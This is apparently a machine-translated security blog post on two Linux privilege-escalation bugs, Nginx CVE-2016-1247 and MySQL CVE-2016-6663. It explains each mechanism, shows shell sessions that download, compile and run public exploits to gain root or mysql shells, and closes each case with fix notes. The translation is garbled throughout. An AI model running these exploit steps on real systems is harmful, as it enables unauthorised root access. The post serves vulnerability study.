Linux application permissions incorrectly can provide the right series vulnerability analysis-vulnerability warning-the black bar safety net

Foreword

linux to powerful file management system, in actual use, although able to work provide great convenience, but if the permissions improper handling, may cause a certain security risk, such as in the operation of the file, change some folder permissions, when the use of some can be freely through the symbolic link, you can enable the corresponding file to the system file, override to modify the system file permissions, an attacker using this principle, the hijacking of so library, or modify the start timing of the script, thereby improving the right.

Case

Nginx CVE-2016-1247

Impact version

Debian*

The vulnerability principle

Debian* default apt-get installation of nginx will put the log directory owner is set to www-data

|

1

2

|

yaseng@ubuntu:/tmp$ ls-ld /var/log/nginx/

drwxr-x— 2 www-data adm 4096 Nov 21 17:42 /var/log/nginx/

—|—

The attacker can put the directory of the log files modified to a symbolic link,pointing to a no permissions to write the file,for example

/etc/ld. so. preload（shared library),when nginx is restarted will modify the/etc/ld. so. preload

Permissions for www-data ,so that you can hijack the environment provide the right to the root.

nginx has a timing script(/etc/logrotate. the d/nginx daily 6:25 restarts ,and re-set the logs permissions ,just write a script to monitor the /etc/ld. so. preload is writable and then overwrite a mention of the right to so file into it.

Vulnerability testing

Environment: Ubuntu 15.04

exiloit : <http://legalhackers.com/advisories/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html&gt;

Install sudo apt-get install nginx

Provide the right

1

2

3

4

5

6

7

|

www-data@ubuntu:/tmp$ pwd

/tmp

www-data@ubuntu:/tmp$ id

uid=33(www-data) gid=33(www-data) groups=33(www-data)

www-data@ubuntu:/tmp$ file 4. sh

4. sh: Bourne-Again shell script, ASCII text executable

www-data@ubuntu:/tmp$ ./ 4. sh /var/log/nginx/error. log

—|—

Wait for nginx to restart,get the root permission

! nginx_1

Bug fixes

Changing the log permissions for the root.

MySQL CVE-2016-6663

Impact version

MariaDB

< 5.5.52

< 10.1.18

< 10.0.28

MySQL

<= 5.5.51

<= 5.6.32

<= 5.7.14

Percona Server

< 5.5.51–38.2

< 5.6.32–78–1

< 5.7.14–8

Percona XtraDB Cluster

< 5.6.32–25.17

< 5.7.14–26.17

< 5.5.41–37.0

The vulnerability principle

MySQL and its derived version in the execution to repair the table( repair table xxx)the business will generate a temporary file xxx. TMD,given xxx. TMD a mysql user permissions SUID,since the MySQL data folder is controlled,as in to give permission before replace the TMD file(e.g. /bin/bash/),you can get the mysql-suid interactive shell. From the web elevation of privileges to a mysql user.

Vulnerability testing

Environment: Ubuntu 15.04 Mysql 5.6.28

exploit:<http://legalhackers.com/exploits/CVE-2016-6663/mysql-privesc-race.c&gt;

Perform

1

2

3

4

5

|

yaseng@ubuntu:/tmp$ sudo apt-get install mysql-server mysql-client

yaseng@ubuntu:/tmp$ sudo service mysqld restart

yaseng@ubuntu:/tmp$ wget http://legalhackers.com/exploits/CVE-2016-6663/mysql-privesc-race.c

yaseng@ubuntu:/tmp$ gcc mysql-privesc-race. c-o mysql-privesc-race-I/usr/include/mysql-lmysqlclient

yaseng@ubuntu:/tmp$ ./ mysql-privesc-race test test localhost test

—|—

Screenshots

! mysql_1

Bug fixes

<https://github.com/mysql/mysql-server/commit/4e5473862e6852b0f3802b0cd0c6fa10b5253291&gt;

[1] [2] next